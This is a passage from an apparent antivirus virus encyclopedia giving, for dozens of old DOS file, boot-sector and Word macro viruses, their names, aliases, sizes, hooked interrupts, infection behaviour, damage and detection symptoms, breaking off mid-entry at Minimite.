  1026. Virus Name: MSWord_Concept
  1027. Alias Name:
  1028. Virus Type: File Virus
  1029. Virus Length:
  1030. Description: This virus infects MSWORD documents.
  1031.  
  1032. When an infected document is opened, the virus
  1033. goes resident by adding some macros to your WORD
  1034. environment.
  1035.  
  1036. Once the virus is active, all documents saved
  1037. using the "Save As..." command will be infected.
  1038.  
  1039. Symptoms include only being able to save files to
  1040. the template directory.
  1041.  
  1042. [Mummy]
  1043. Virus Name: Mummy
  1044. Alias Name:
  1045. Virus Type: File Virus
  1046. Virus Length: 1,300 - 1,503 bytes
  1047. Description: This virus infects *.EXE files
  1048.  
  1049. Executing Procedure:
  1050. 1) The virus checks whether it is already loaded
  1051.    resident in memory. If "No", it then loads
  1052.    itself into resident memory by hooking INT 21h.
  1053. 2) It then executes the original file.
  1054. 3) With itself loaded into resident memory it will
  1055.    infect any uninfected file that is executed.
  1056.  
  1057. Damage: This virus has several variants. While
  1058. some variants have no damage routine, some will
  1059. slow down the system performance and variants of
  1060. the Mummy virus will have a Random Number counter.
  1061. When the counter reaches zero, virus will
  1062. overwrite first part of hard disk and cause severe
  1063. data loss.
  1064.  
  1065. Detecting Method: Increases infected file size by
  1066. 1,300-1,503 bytes. Virus occasionally hangs the
  1067. system when the virus is resident in memory.
  1068. Encrypted text strings inside the virus code as
  1069. follows:
  1070.  
  1071.     "Mummy Version x.xxx",
  1072.     "Kaohsiung Senior School",
  1073.     "Tzeng Jau Ming presents",
  1074.     "Series Number=[xxxxx]."
  1075.  
  1076. Note: 1) Loads itself resident in memory. An error
  1077. message occurs if there is an I/O error (such as
  1078. write protect).
  1079.  
  1080. [Natas]
  1081. Virus Name: Natas
  1082. Alias Name: Satan, Sat_Bug.Natas, Natas-4, Natas-6
  1083. Virus Type: File Virus
  1084. Virus Length: 4,746 bytes
  1085. Description: This virus infects *.COM and *.EXE
  1086.              files
  1087.  
  1088. Interrupt vectors hooked: INT 13h, INT 21h.
  1089.  
  1090. Infection method: When the system is booted with
  1091. an infected disk, the virus loads itself in memory
  1092. and infects the master boot record. While loaded,
  1093. it infects any accessed executable files or
  1094. diskettes. Total system memory decreases by 5,664
  1095. bytes. Infected files increase in length by 4,744
  1096. bytes.
  1097.  
  1098. Damage: The virus formats the hard disk and
  1099. destroys data stored on diskettes.
  1100.  
  1101. [No_of_Beast]
  1102. Virus Name: No_of_Beast
  1103. Alias Name: No. of the Beast,
  1104. Number_of_the_Beast.E, DARTH, 666, 512
  1105. Virus Type: File Virus
  1106. Virus Length: 512 bytes
  1107. Description: This virus infects *.COM files
  1108.  
  1109. Interrupt vectors hooked: INT 13h, INT 21h.
  1110.  
  1111. Infection method: When an infected file runs, the
  1112. virus loads itself in memory. While loaded, it
  1113. infects accessed .COM files. The virus overwrites
  1114. the first 512 bytes of the files it infects, but
  1115. stores the original data in free space at the end
  1116. of the file.
  1117.  
  1118. Damage: If an infected file is copied, some of its
  1119. original data could be destroyed.
  1120.  
  1121. Note: If you attempt to examine an infected file
  1122. while the virus is in memory, it will display the
  1123. original, uninfected version.
  1124.  
  1125. [Nop]
  1126. Virus Name: Nop
  1127. Alias Name: Nops, Stealth_Boot,
  1128. Virus Type:
  1129. Virus Length:
  1130. Description: See Stealth_Boot.C
  1131.  
  1132. [Nov_17th]
  1133. Virus Name: Nov_17th
  1134. Alias Name: November 17th
  1135. Virus Type: File virus
  1136. Virus Length: 885 bytes
  1137. Description: This virus infects *.COM and *.EXE
  1138.              files
  1139.  
  1140. Executing Procedure:
  1141. 1) The virus checks whether it is already loaded
  1142.    resident in memory. If "No", it then loads
  1143.    itself into resident memory by hooking INT 21h.
  1144. 2) It then executes the original file.
  1145. 3) With itself loaded into resident memory it will
  1146.    infect any uninfected file that is executed.
  1147.  
  1148. Damage: On any day between November 17 and 30, the
  1149. virus destroys the first 8 sectors of the current
  1150. disk.
  1151.  
  1152. Note: Loads itself resident in memory. An error
  1153. message occurs if there is an I/O error (such as
  1154. write protect).
  1155.  
  1156. [One_half]
  1157. Virus Name: One_half
  1158. Alias Name:
  1159. Virus Type: File Virus
  1160. Virus Length: 3,544 bytes
  1161. Description: This virus infects *.COM and *.EXE
  1162.              files as well as COMMAND.COM
  1163.  
  1164. Interrupt vectors hooked: INT 21h.
  1165.  
  1166. Infection method: When an infected file runs, the
  1167. virus loads itself in memory. While loaded, it
  1168. infects any accessed, executable files or boot
  1169. sectors. The DOS CHKDSK program will show a "total
  1170. bytes memory" decrease of 4,096 bytes. Infected
  1171. .COM and .EXE files increase by 3,544 bytes.
  1172.  
  1173. Damage: Under analysis.
  1174.  
  1175. Note: If you attempt to examine the hard drive
  1176. while the virus is in memory, it will display the
  1177. original, uninfected version.
  1178.  
  1179. [Ontario]
  1180. Virus Name: Ontario
  1181. Alias Name:
  1182. Virus Type: File virus
  1183. Virus Length: 512 bytes
  1184. Description: This virus infects *.COM, *.EXE and
  1185.              overlay files, as well as COMMAND.COM.
  1186.  
  1187. When an infected file is executed, the virus
  1188. installs itself into memory. Total available
  1189. memory will have decreased by 2,048 bytes.  The
  1190. virus will also infect COMMAND.COM increasing it's
  1191. size by 512 bytes.
  1192.  
  1193. Once the virus is memory resident, it will infect
  1194. files when they are executed.  Infected files will
  1195. increase in size by 512 - 1,023 bytes depending on
  1196. the type of file.
  1197.  
  1198. [Parity_boot.b]
  1199. Virus Name: Parity_Boot.B
  1200. Alias Name: Parity_BOOT.B, Generic1
  1201. Virus Type: Boot Virus
  1202. Virus Length: N/A
  1203. Description: This virus infects boot sectors
  1204.  
  1205. Interrupt vectors hooked: INT 13h.
  1206.  
  1207. Infection method: When the system is booted from
  1208. an infected diskette, the virus infects the master
  1209. boot record and loads itself in memory. While
  1210. loaded, it infects all accessed, non-protected
  1211. disks. The DOS CHKDSK program will show a "total
  1212. bytes memory" decrease of 1,024 bytes.
  1213.  
  1214. Damage: The virus sets a one-hour delay timer when
  1215. the system is turned on. Each time a floppy is
  1216. infected, the timer is reset. If no floppies are
  1217. infected, the virus simulates a parity error,
  1218. displaying the following message and hanging the
  1219. system:
  1220.  
  1221.     Parity Check
  1222.  
  1223. Note: If you attempt to examine boot sectors while
  1224. the virus is in memory, it will display the
  1225. original, uninfected version.
  1226.  
  1227. [Readiosys]
  1228. Virus Name: Readiosys
  1229. Alias Name: AntiCMOS, Lenart
  1230. Virus Type: Boot Virus
  1231. Virus Length: N/A
  1232. Description: This virus infects boot sectors
  1233.  
  1234. When the system is booted from an infected hard
  1235. disk, the virus loads itself in memory.  After
  1236. loading successfully, it infects most accessed
  1237. disks.  The DOS CHKDSK program will show a "total
  1238. bytes memory" decrease of 2,048 bytes.
  1239.  
  1240. This virus may change the CMOS settings, depending
  1241. on the system hardware. In many cases, the system
  1242. will hang before the virus can finish loading into
  1243. memory.
  1244.  
  1245. [Ripper]
  1246. Virus Name: Ripper
  1247. Alias Name: Jack Ripper
  1248. Virus Type:   Boot Virus
  1249. Virus Length: N/A
  1250. Description: This virus infects boot sectors
  1251.  
  1252. Infection method: The virus is loaded in memory
  1253. when the system is booted from an infected
  1254. diskette. While loaded, the virus infects any
  1255. accessed, non-protected disks.
  1256.  
  1257. Damage: The virus corrupts the hard disk over time
  1258. by randomly selecting disk writes (approximately 1
  1259. per 1000) and swapping two words in the write
  1260. buffer.
  1261.  
  1262. Note: If you attempt to examine the infected boot
  1263. sectors while the virus is in memory, it will
  1264. display the original, uninfected version.
  1265.  
  1266. [Slayer]
  1267. Virus Name: Slayer
  1268. Alias Name: 5120, Vbasic
  1269. Virus Type: File Virus
  1270. Virus Length: 5,120 bytes
  1271. Description: This virus infects *.COM and *.EXE
  1272.              files.
  1273.  
  1274. When an infected file is executed, the virus will
  1275. infect all *.COM and *.EXE files located in the
  1276. same directory.  Infected files will increase in
  1277. size from 5,120 to 5,135 bytes with the virus
  1278. being located at the end of the file.  Date and
  1279. time information of infected files will not be
  1280. altered.
  1281.  
  1282. [Squisher]
  1283. Virus Name: Squisher
  1284. Alias Name: Tiny Hunter
  1285. Virus Type: File Virus
  1286. Virus Length: 340 bytes
  1287. Description: This virus infects *.COM  files, as
  1288.              well as COMMAND.COM.
  1289.  
  1290. When an infected file is executed, the virus
  1291. installs itself into memory. Total available
  1292. memory will not have changed.
  1293.  
  1294. Once the virus is memory resident, it will infect
  1295. *.COM which contain more than 340 bytes of hex
  1296. '00' characters when they are executed.  Infected
  1297. files will not experience an increase in size.
  1298. Date and time information of infected files will
  1299. not be altered.
  1300.  
  1301. [Stealth_Boot.C]
  1302. Virus Name: Stealth_Boot.C
  1303. Alias Name: Amse, Nops, STELBOO, STB
  1304. Virus Type:  Boot Virus
  1305. Virus Length: N/A
  1306. Description: This virus infects boot sectors
  1307.  
  1308. Interrupt vectors hooked: INT 13h.
  1309.  
  1310. Infection method: When the system is booted from
  1311. an infected diskette, the virus loads itself in
  1312. memory and infects the master boot record.  While
  1313. loaded, it infects any accessed, non-protected
  1314. diskettes.  The DOS CHKDSK program will show a
  1315. "total bytes memory" decrease of 4,000 bytes.
  1316.  
  1317. Damage: No intentional damage.
  1318.  
  1319. Note: If you attempt to examine the infected hard
  1320. disk sectors while the virus is in memory, it will
  1321. return a zero-filled buffer.
  1322.  
  1323. [Stoned]
  1324. Virus Name: Stoned
  1325. Alias Name: Marijuana, New Zealand,
  1326.             Stoned.Standard.A
  1327. Virus Type: Boot Virus
  1328. Virus Length: N/A
  1329. Description: This virus infects boot sectors
  1330.  
  1331. Interrupt vectors hooked: INT 13h.
  1332.  
  1333. Infection method: When the system is booted from
  1334. an infected floppy, the virus loads itself in
  1335. memory and infects the hard disk.  While loaded,
  1336. it infects any accessed diskettes.  The DOS CHKDSK
  1337. program will show a "total bytes memory" decrease
  1338. of 2,048 bytes.
  1339.  
  1340. Damage: No intentional damage. Displays the text
  1341. string:
  1342.  
  1343.     Your PC is now Stoned!
  1344.  
  1345. [Stoned.Azusa]
  1346. Virus Name: Stoned.Azusa
  1347. Alias Name: Azusa, Hong Kong
  1348. Virus Type: Boot Virus
  1349. Virus Length: N/A
  1350. Description: This virus infects boot sectors
  1351.  
  1352. Interrupt vectors hooked: INT 13h.
  1353.  
  1354. Infection method: When a system is booted from an
  1355. infected disk, the virus loads itself in memory.
  1356. While loaded, it attempts to infect any accessed
  1357. disks.  Unlike most boot sector viruses, it does
  1358. not preserve a copy of the original master boot
  1359. record. Instead it overwrites it and takes over
  1360. its functions. The DOS CHKDSK program will show a
  1361. "total bytes memory" decrease of 1,024 bytes.
  1362.  
  1363. Damage: After a specified number of reboots, the
  1364. virus temporarily disables the serial and parallel
  1365. ports.
  1366.  
  1367. [Sunday-1]
  1368. Virus Name: Sunday-1
  1369. Alias Name:
  1370. Virus Type: File Virus
  1371. Virus Length: 1,636 bytes
  1372. Description: This virus infects *.COM and *.EXE
  1373.              files as well as overlay files.
  1374.  
  1375. Damage: On Sunday, the virus may damage the FAT
  1376. table.  It will also display the following
  1377. message:
  1378.  
  1379.     "Today is Sunday! Why do you work so hard?
  1380.     All work and no play makes you a dull boy!
  1381.     Come on!  Let's go out and have some fun!"
  1382.  
  1383. [Taiwan]
  1384. Virus Name: Taiwan
  1385. Alias Name: Taiwan 2
  1386. Virus Type: File Virus
  1387. Virus Length: 743 bytes
  1388. Description: This virus infects *.COM files and
  1389.              COMMAND.COM
  1390.  
  1391. When an infected file is executed, the virus will
  1392. attempt to infect three *.COM files starting from
  1393. C:\.  Infected files will increase in size by 743
  1394. bytes with the virus being located at the
  1395. beginning of the file.
  1396.  
  1397. The virus is activated on the 8th of any month
  1398. when it will overwrite the FAT table and root
  1399. directory.
  1400.  
  1401. [Telecom]
  1402. Virus Name: Telecom
  1403. Alias Name: Telefonica
  1404. Virus Type: File Virus
  1405. Virus Length: 3,700 bytes
  1406. Description: This virus infects *.COM files
  1407.  
  1408. When an infected file is executed, the virus
  1409. installs itself into memory. Total available
  1410. memory will have decreased by 3,984 bytes.
  1411.  
  1412. Once the virus is memory resident, it will infect
  1413. *.COM files that are larger than 1,000 bytes when
  1414. they are executed. Infected files will increase in
  1415. size by 3,700 bytes.  Date and time information of
  1416. infected files will be altered with 100 being
  1417. added to the year.
  1418.  
  1419. [Tequila]
  1420. Virus Name: Tequila
  1421. Alias Name: Stealth
  1422. Virus Type: File Virus
  1423. Virus Length: 2,468 bytes
  1424. Description: This virus infects *.EXE files as
  1425.              well as boot sectors.
  1426.  
  1427. Interrupt vectors hooked: INT 13h, INT 21h.
  1428.  
  1429. Infection method: The first time an infected file
  1430. runs, the virus infects the master boot record.
  1431. When the system is booted from the infected hard
  1432. disk, the virus loads itself in memory.  While
  1433. loaded, it infects any .EXE file that executes.
  1434. The DOS CHKDSK program will show a "total bytes
  1435. memory" decrease of 3,072 bytes. Infected .EXE
  1436. files increase by 2,468 bytes.  The virus won't
  1437. infect files starting with "V" or "SC."
  1438.  
  1439. Damage: Several months after the initial
  1440. infection, the virus becomes active. Each month
  1441. afterward, if an infected program is run on the
  1442. same day of the first infection, a graphic and
  1443. this message will be displayed.
  1444.  
  1445.     Welcome to T.TEQUILA'S latest production.
  1446.     Contact T.TEQUILA/P.o.Box 543/6312
  1447.     St'hausen/Switzerland
  1448.     Loving thoughts to L.I.N.D.A
  1449.     BEER and TEQUILA forever !
  1450.  
  1451. Note: The virus hides the infected partition
  1452. record and increases in the size of infected
  1453. files.
  1454.  
  1455. [Traveller]
  1456. Virus Name: Traveller
  1457. Alias Name: Bupt
  1458. Virus Type: File Virus
  1459. Virus Length: 1,220 to 1,237 bytes
  1460. Description: This virus infectes *.COM and *.EXE
  1461.              files, as well as COMMAND.COM.
  1462.  
  1463. When an infected file is executed, the virus
  1464. installs itself into memory. Total available
  1465. memory will have decreased by 1,840 bytes.
  1466.  
  1467. Once the virus is memory resident, it will infect
  1468. *.COM and *.EXE files when they are executed.
  1469. This virus will also infect when the DIR command
  1470. is used.  Infected files will increase in size by
  1471. 1,220 to 1,237 bytes, with the virus being located
  1472. at the end of the infected file. Date and time
  1473. information of infected files will not be altered.
  1474.  
  1475. The following text string can be found in the
  1476. virus:
  1477.  
  1478.     "Traveller (C) BUPT  1991.4"
  1479.     "Don't panic I'm harmless <<---!!!!!!!"
  1480.     "*.* COMEXE"
  1481.  
  1482. [Trivial]
  1483. Virus Name: Trivial
  1484. Alias Name: Minimal, Mini-45
  1485. Virus Type: File Virus
  1486. Virus Length: 45 bytes
  1487. Description: This virus infects *.COM files, as
  1488.              well as COMMAND.COM.
  1489.  
  1490. When an infected file is executed, the virus will
  1491. infect all *.COM files in same directory.  The
  1492. first 45 bytes of infected files will be
  1493. overwritten by the virus.  The date and time
  1494. information of infected files will be updated to
  1495. the time of infection.
  1496.  
  1497. All infected files will be permanently corrupted.
  1498.  
  1499. [V-sign]
  1500. Virus Name: V-sign
  1501. Alias Name: Cansu, Sigalet, Sigalit
  1502. Virus Type:   Boot Virus
  1503. Virus Length: N/A
  1504. Description: This virus infected Floppy boot
  1505.              sectors.
  1506.  
  1507. Interrupt vectors hooked: INT 13h.
  1508.  
  1509. Infection method: When an infected disk is booted,
  1510. the virus loads itself in memory. While loaded, it
  1511. infects any accessed disk. The DOS CHKDSK program
  1512. will show a "total bytes memory" decrease of 2 KB.
  1513.  
  1514. Damage: After infecting 64 disks, the virus
  1515. displays a large V and hangs the machine.
  1516.  
  1517. [V2P6]
  1518. Virus Name: V2P6
  1519. Alias Name:
  1520. Virus Type: File Virus
  1521. Virus Length: 1,946 to 2,111 bytes
  1522. Description: This virus infects *.COM  files.
  1523.  
  1524. When an infected file is executed, the virus will
  1525. infect the first *.COM file in the same directory
  1526. that is not already infected.  Infected files will
  1527. experience a file length increase of 1,946 to
  1528. 2,111 bytes in length with the virus being located
  1529. at the end of the file.
  1530.  
  1531. [Vacsina]
  1532. Virus Name: Vacsina
  1533. Alias Name: Vacsina.TP-05.A, TP family
  1534. Virus Type: File Virus
  1535. Virus Length: 1,206 bytes
  1536. Description: This virus infects *.COM and *.EXE
  1537.              files.
  1538.  
  1539. Infection method: When an infected file runs, the
  1540. virus loads itself in memory. While loaded, it
  1541. infects any file that executes. Before infecting
  1542. .EXE files, the virus converts them to a .COM file
  1543. format.
  1544.  
  1545. Damage: None known.
  1546.  
  1547. Note: There are many known variants of the Vacsina
  1548. virus. The Vacsina family of viruses is also known
  1549. as the "T.P." family.
  1550.  
  1551. [VCL]
  1552. Virus Name: VCL
  1553. Alias Name: Code Zero
  1554. Virus Type: File Virus
  1555. Virus Length: 576 bytes
  1556. Description: This virus infects *.COM  files, as
  1557.              well as COMMAND.COM.
  1558.  
  1559. When an infected file is executed, the virus will
  1560. search the same directory for a *.COM file which
  1561. is not already infected. Infected files will
  1562. experience a file length increase of 576 bytes
  1563. with the virus being located at the end of the
  1564. file.  If no uninfected files are found, the
  1565. following message is displayed:
  1566.  
  1567.     "** CODE ZERO **"
  1568.  
  1569. Date and time information of infected files will
  1570. not be altered.
  1571.  
  1572. The following text string can be found in the
  1573. virus:
  1574.  
  1575.     "*.* *.COM"
  1576.     "** CODE ZERO **"
  1577.     "Code Zero Virus"
  1578.     "1992 Nowhere Man/[NukE]"
  1579.  
  1580. [Vengence]
  1581. Virus Name: Vengence
  1582. Alias Name: Parasite, Vengeance
  1583. Virus Type: File Virus
  1584. Virus Length: 723 bytes
  1585. Description: This virus infects *.COM  files, as
  1586.              well as COMMAND.COM.
  1587.  
  1588. When an infected file is executed, the virus will
  1589. infect the first uninfected *.COM file in the same
  1590. directory.  Infected files will experience a file
  1591. length increase of 723 bytes with the virus being
  1592. located at the end of the file.  Date and time
  1593. information of infected files will be altered to
  1594. show 56 in the seconds field.
  1595.  
  1596. The following text string can be found in the
  1597. virus:
  1598.  
  1599.     "*** Vengeance is ours! ***"
  1600.     "SKISM/Phalcon '92"
  1601.     "PATH=*.COM"
  1602.     "????????COM"
  1603.  
  1604. [Vienna]
  1605. Virus Name: Vienna
  1606. Alias Name: DOS-62, Unesco, Austrian, 648, PC Boot
  1607. Virus Type: File Virus
  1608. Virus Length: 648 bytes
  1609. Description: This virus infects *.COM files
  1610.  
  1611. Symptoms: Increases infected file sizes by 648
  1612. bytes and files containing string "*.COM" and
  1613. "PATH=". Destroyed programs will cause computer to
  1614. reboot while in operation.
  1615.  
  1616. Damage: With the probability of 1:7 the virus will
  1617. not infect other files. Virus writes the
  1618. instruction JMP F000:FFF0 (computer reboot ) at
  1619. the start of such a program. Original content is
  1620. destroyed, length of file is not changed, and
  1621. destroyed program contains virus flag.
  1622.  
  1623. [XPEH]
  1624. Virus Name: XPEH
  1625. Alias Name: 4-B, Yankee Doodle.XPEH.4928, Micropox
  1626. Virus Type: File Virus
  1627. Virus Length: 4,016 bytes
  1628. Description: This virus infects *.COM and *.EXE
  1629.              files.
  1630.  
  1631. Interrupt vectors hooked: INT 1Ch, INT 21h.
  1632.  
  1633. Infection method: When an infected file runs, the
  1634. virus loads itself in memory. While loaded, it
  1635. infects any accessed, executable files. The DOS
  1636. CHKDSK program will show a "total bytes memory"
  1637. decrease of 4032 bytes. Infected files increase by
  1638. 4016 bytes.
  1639.  
  1640. Damage: Under analysis.
  1641.  
  1642. [Yank-D.TP.44.A]
  1643. Virus Name: Yank-D.TP.44.A
  1644. Alias Name: Yankee Doodle, TP44
  1645. Virus Type: File Virus
  1646. Virus Length: 2,899 bytes
  1647. Description: This virus infects *.COM and *.EXE
  1648.              files.
  1649.  
  1650. When an infected file is executed, the virus
  1651. installs itself into memory. Once the virus is
  1652. memory resident, it play the song "Yankee Doodle"
  1653. on the computer speaker everyday at 5 p.m.
  1654.  
  1655. Infected files will experience a file length
  1656. increase of 2,899 bytes.
  1657.  
  1658. [Simple]
  1659. Virus Name: Simple cd
  1660. Virus Type: File Infector Virus (infects .COM
  1661.             files only.)
  1662. Virus Length:  No change
  1663. PC Vectors Hooked: None
  1664.  
  1665. Executing Procedure: Searches for .COM files in
  1666. the current directory. When it finds a .COM file
  1667. it checks whether it has been  previously infected
  1668. by the SIMPLE virus. If "YES" it continues to look
  1669. for uninfected .COM files. It then Infects the
  1670. file and looks for the next COM file until all the
  1671. .COM files in the current directory are infected.
  1672.  
  1673. Damage: Overwrites the original file, so the
  1674. length of the original file won't reflect any
  1675. increase. Note: Doesn't stay resident in memory.
  1676. SIMPLE doesn't hook INT 24h when infecting files.
  1677. Error message occurs if there is an I/O error
  1678. present (such as write protect).
  1679.  
  1680. [Alien-1]
  1681. Virus Name: Alien-1
  1682. Virus Type: File Infector Virus (infects .COM &
  1683.             .EXE files.)
  1684. Virus Length: 571 Bytes (COM &EXE)
  1685. PC Vectors Hooked: INT 21h
  1686.  
  1687. Executing Procedure: Checks whether it has been
  1688. loaded resident in high memory.  If  "No", then it
  1689. loads itself into resident memory (highest memory)
  1690. by hooking INT 21, then it executes the originally
  1691. called file, if "Yes' then it directly executes
  1692. the originally called file.
  1693.  
  1694. Damage:  None
  1695.  
  1696. Characteristics:
  1697. 1) The virus infects files by hooking INT
  1698.    21h(AX=4B), when an uninfected file is
  1699.    executed, the file will be infected.
  1700. 2) Alien-1 doesn't hook INT 24h when infecting
  1701.    files. Error messages occur if there is an I/O
  1702.    error (such as write protect.)
  1703.  
  1704. Detecting Method: Infected files will increase by
  1705. 571 Bytes.
  1706.  
  1707. [Lep-0736]
  1708. Virus Name: Lep-0736
  1709. Virus Type: File Infector Virus (infects .COM &
  1710.             .EXE files.)
  1711. Virus Length: No change
  1712. PC Vectors Hooked: None
  1713.  
  1714. Executing Procedure:
  1715. 1) Searches for .COM and .EXE files in current
  1716.    directory.
  1717. 2) Checks whether the files found have been
  1718.    infected by LEP-0736. If "Yes", continue to
  1719.    look for a uninfected COM & EXE file.
  1720. 3) Infect the uninfected file (infect only fore
  1721.    files at one time). Then such information
  1722.    occurs on the screen:"Program too big to fit
  1723.    in memory"
  1724.  
  1725. Damage:
  1726. Overwrites the original file, so the length of
  1727. the file won't increase.
  1728. Detecting Method:
  1729. Checks for the erroneous screen message
  1730. "Program too big to fit in memory."
  1731. Note:
  1732. 1) Doesn't stay resident in memory.
  1733. 2) LEP-0736 doesn't  hook INT 24h when infecting
  1734.    files. Error message occurs  if there is an
  1735.    I/O error (such as write protect).
  1736.  
  1737. [Ice-199]
  1738. Virus Name: Ice-199
  1739. Virus Type: File Infector Virus
  1740.             (infects .COM files only.)
  1741. Virus Length: 199 Bytes
  1742. PC Vectors Hooked: None
  1743. Executing Procedure:
  1744. 1) Searches for a .COM file in the current
  1745.    directory.
  1746. 2) Checks whether it has been infected by ice-199.
  1747.    If "Yes", continues to look for an uninfected
  1748.    .COM file.
  1749. 3) Infects only one file at a time.
  1750. Damage:  None
  1751. Detecting Method:  Infected files will increase
  1752.                    length by 199 Bytes.
  1753. Note:
  1754. 1) Doesn't stay resident in memory.
  1755. 2) ICE-199 doesn't hook INT 24h when infecting
  1756.    files. Error message occurs if there is an
  1757.    I/O error (such as write protect.)
  1758.  
  1759. [Made-255]
  1760. Virus Name: Made-255
  1761. Virus Type: File Infector Virus
  1762.             (infects .COM files.)
  1763. Virus Length: 255 Bytes
  1764. PC Vectors Hooked: None
  1765. Executing Procedure:
  1766. 1) Searches for a .COM file in the current
  1767.    directory.
  1768. 2) Checks whether it has been infected by
  1769.    Made-255. If "Yes", it continues to look for an
  1770.    uninfected .COM file.
  1771. 3) Infects only one file at a time.
  1772. Damage:  None
  1773. Detecting Method:  Infected files will increase
  1774.                    by 255 Bytes.
  1775. Note:
  1776. 1) After infected file is executed, the system
  1777.    will halt.
  1778. 2) Doesn't stay resident in memory.
  1779. 3) MADE-255 doesn't hook INT 24h when infecting
  1780.    files. Error message occurs if there is an I/O
  1781.    error (such as write protect).
  1782.  
  1783. [2570]
  1784. Virus Name: 2570
  1785. Virus Type: File Infector Virus
  1786.             (infects .COM files only.)
  1787. Virus Length:   2570 Bytes
  1788. PC Vectors Hooked:      None
  1789. Executing Procedure:
  1790. Searches for a .COM file in the current directory.
  1791. Checks first to verify if a file has been
  1792. previously infected by 2570. If "Yes", continues
  1793. to look for   an uninfected .COM file. Infects
  1794. only one .COM file at a time. At infection,
  1795. information, such as those listed following, will
  1796. appear on the infected computer screen:
  1797. a) Cycle sluts from hell..
  1798. b) Virus Mania IV..
  1799. c) 2 Live Crew is fucking cool..
  1800. d) Like Commentator I, HIP-HOP sucks..
  1801. e) dr. Ruth is a first-class lady!..
  1802. f) Don t be a wimp, Be dead!.. and so on. Then the
  1803.    originally called program will be executed.
  1804. Damage:  None
  1805. Detecting Method:  Infected files will increase
  1806.                    by 2570 Bytes.
  1807. Note:
  1808. Doesn't stay resident in memory. 2570 doesn't hook
  1809. INT 24h when infecting files. Error message occurs
  1810. if there is an I/O error(such as write protect.)
  1811.  
  1812. [Ice-250]
  1813. Virus Name: Ice-250
  1814. Virus Type: File Infector Virus
  1815.             (infects .COM files.)
  1816. Virus Length: 250 Bytes
  1817. PC Vectors Hooked: None
  1818. Executing Procedure:
  1819. 1) Searches for a .COM file in the current
  1820.    directory.
  1821. 2) Checks whether it has been infected by Ice-250.
  1822.    If "Yes", it continues to look for an
  1823.    uninfected .COM file.
  1824. 3) It infects only one file at a time.
  1825. Damage:  None
  1826. Detecting Method:  Infected files will increase
  1827.                    by 250 Bytes.
  1828. Note:
  1829. 1) Doesn't stay resident in memory.
  1830. 2) ICE-250 doesn't hook INT 24h when infecting
  1831.    files. Error message occurs if there is an
  1832.    I/O error (such as write protect.)
  1833.  
  1834. [Ice-224]
  1835. Virus Name: Ice-224
  1836. Virus Type: Virus File Infector
  1837.             (infects .COM files.)
  1838. Virus Length: 224 Bytes
  1839. PC Vectors Hooked: None
  1840. Executing Procedure:
  1841. 1) Searches for a .COM file in the current
  1842.    directory.
  1843. 2) Checks whether it has been infected by
  1844.    Ice-224. If "Yes", it continues to look for an
  1845.    uninfected .COM file.
  1846.    3) Infects only one file at one time.
  1847. Damage:  None
  1848. Detecting Method:  Infected files will increase
  1849.                    by 224 Bytes.
  1850. Note:
  1851. 1) Doesn't stay resident in memory.
  1852. 2) ICE-224 doesn't hook INT 24h when infecting
  1853.    files. Error message occurs if there is an
  1854.    I/O error (such as write protect.)
  1855.  
  1856. [Lct-762]
  1857. Virus Name: Lct-762
  1858. Virus Type: File Infector Virus
  1859.             (infects .COM files)
  1860. Virus Length: 762 Bytes
  1861. PC Vectors Hooked: None
  1862. Executing Procedure:
  1863. 1) Searches for a .COM file in the current
  1864.    directory.
  1865. 2) Checks whether it has been infected by LCT-762.
  1866.    If "Yes", continues to look for a uninfected
  1867.    .COM file.
  1868. 3) Infects  uninfected files until all .COM files
  1869.    in the directory have been infected.
  1870. Damage:  None
  1871. Detecting Method:  Infected files will increase
  1872.                    by 762 Bytes.
  1873. Note:
  1874. 1) Doesn't stay resident in memory.
  1875. 2) LCT-762 doesn't hook INT 24h when infecting
  1876.    files. An error message occurs if there is an
  1877.    I/O error (such as write.)
  1878.  
  1879. [Alien-3]
  1880. Virus Name: Alien-3
  1881. Virus Type: File Infector Virus
  1882.             (infects .COM & .EXE files)
  1883. Virus Length: 625 Bytes(COM &EXE)
  1884. PC Vectors Hooked: INT 21h
  1885. Executing Procedure:
  1886. 1) Checks whether it has been loaded resident in
  1887.    high memory.  If "No", then it loads itself
  1888.    into resident memory (highest memory portion)
  1889.    by hooking INT 21h..
  1890. 2) Following the virus will check the system time,
  1891.    if the number of minutes passed in the hour are
  1892.    between 33 to 60, it    will show a " "
  1893.    parentheses mark on the screen.
  1894. 3) After infection it will then execute the
  1895.    original file.
  1896. Damage:  None
  1897. Characteristics:
  1898. 1) The virus infects  files by hooking INT
  1899.    21h(AX=4B), when an uninfected file is
  1900.    executed, the file will be infected.
  1901. 2) Alien-3 doesn't hook INT 24h when infecting
  1902.    files. Error message occurs if there is an I/O
  1903.    error (such as write protect.)
  1904. Detecting Method: Infected files will increase
  1905.                   by 625 Bytes.
  1906.  
  1907. [Lep-562]
  1908. Virus Name: Lep-562
  1909. Virus Type: File Infector Virus
  1910.             (infects .COM & .EXE files)
  1911. Virus Length: No change
  1912. PC Vectors Hooked: None
  1913. Executing Procedure:
  1914. 1) It first searches for a .COM and .EXE file
  1915.    in the current directory.
  1916. 2) It checks whether it has been infected by
  1917.    LEP-562. If "Yes", it continues to look for
  1918.    uninfected .COM & .EXE files.
  1919. 3) If  No" it will infect the uninfected files
  1920.    (infecting only four files at one time). Then
  1921.    when you execute the file such information
  1922.    occurs on the screen:
  1923.    "Program too big to fit in memory."
  1924. Damage:  Overwrite the original file, so the
  1925.          length of the file won't increase.
  1926. Detecting Method:
  1927. Check whether the message:
  1928. "Program too big to fit in memory" occurs on the
  1929. screen.
  1930. Note:
  1931. 1) Doesn't stay resident in memory.
  1932. 2) LEP-562 doesn't hook INT 24h when infecting
  1933.    files. Error message occurs if there is an
  1934.    I/O error (such as write protect).
  1935.  
  1936. [Navi-282]
  1937. Virus Name: Navi-282
  1938. Virus Type: File Infector Virus
  1939.             (infects .COM files only)
  1940. Virus Length: 282 Bytes
  1941. PC Vectors Hooked: None
  1942. Executing Procedure:
  1943. 1) Search for a .COM file in the current
  1944.    directory.
  1945. 2) Checks whether it has been infected by
  1946.    NAVI-282. If "Yes", it continues to look for
  1947.    any uninfected .COM files.
  1948. 3) Infects only one file at a time.
  1949. Damage:  None
  1950. Detecting Method:  Infected files will increase
  1951.                    by 282 Bytes.
  1952. Note:
  1953. 1) Doesn't stay resident in memory.
  1954. 2) NAVI-282 doesn't hook INT 24h when infecting
  1955.    files. Error message occurs if there is an
  1956.    I/O error (such as write protect).
  1957.  
  1958. [Minimite]
  1959. Virus Name: Minimite
  1960. Virus Type: File Infector Virus
  1961.             (infects .COM files)
  1962. Virus Length: 183 Bytes
  1963. PC Vectors Hooked: None
